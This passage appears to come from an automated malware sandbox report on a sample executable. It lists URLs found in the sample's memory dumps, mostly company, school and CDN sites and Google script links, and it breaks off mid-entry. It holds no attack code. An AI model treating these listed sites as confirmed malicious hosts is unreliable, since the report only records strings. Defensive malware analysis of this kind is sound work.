                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.com-sit.com%2F&#038;format=xm
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/wp/v2/pages/641
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/xmlrpc.php?rsd
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/zh-hans/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432102379.0000000008D00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.crcsi.org/
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.271358037.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.277227725.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.423509233.0000000000A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.credo.edu.pl/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dgmna.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.423783335.0000000008600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.277227725.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.edimart.hu/
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.fcwcvt.org/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js?render=6LcHyq0UAAAAAGiNpvMw5_7JkN6Gt8I9SHaGgkJT&#038;ver=3.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js?render=explicit&#038;ver=3.3.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-CDTYFWBRBX
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429302770.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434048283.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431188888.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429996077.0000000005580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431935732.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gpthink.com
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.477486022.0000000005150000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.294223177.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.293737431.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.279091623.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.jacomfg.com/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075F8000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.264866958.000000000756C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.jenco.co.uk/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314500581.0000000005110000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ka-mo-me.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.349853275.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.603177646.000000000760A000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438940303.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.kernsafe.com/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.kernsafe.com/T
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.linkedin.com/company/pohl-food-service
                      Source: iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.370327793.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.namebrightstatic.com/images/bg.png)
                      Source: iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.370327793.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.namebrightstatic.com/images/error_board.png)
                      Source: iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.370327793.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.namebrightstatic.com/images/header_bg.png)
                      Source: iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.370327793.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.namebrightstatic.com/images/logo_off.gif)
                      Source: iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.370327793.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.namebrightstatic.com/images/site_maintenance.png)
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.423834877.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 